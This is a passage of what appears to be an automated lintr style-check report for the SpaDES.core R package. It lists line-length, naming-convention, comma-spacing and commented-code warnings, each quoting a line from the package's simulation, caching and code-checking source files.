event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:413:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/cache.R#L413) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #   makes soft copy of all objects, i.e., they have the identical objects, which are pointers only\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:441:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/cache.R#L441) *style:* **Lines should not be more than 100 characters.**\n```r\n​        list2env(mget(lsObjectEnv[lsObjectEnv %in% createOutputs | lsObjectEnv %in% expectsInputs], envir = object@.envir), envir = object2@.envir)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:451:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/cache.R#L451) *style:* **Commented code should be removed.**\n```r\n​          #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:455:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/cache.R#L455) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # This is for objects that are not in the return environment yet because they are unrelated to the\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:468:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/cache.R#L468) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:472:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/cache.R#L472) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:473:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/cache.R#L473) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:474:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/cache.R#L474) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:507:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/cache.R#L507) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:530:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/cache.R#L530) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:622:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/cache.R#L622) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:649:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/cache.R#L649) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:657:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/cache.R#L657) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L504) 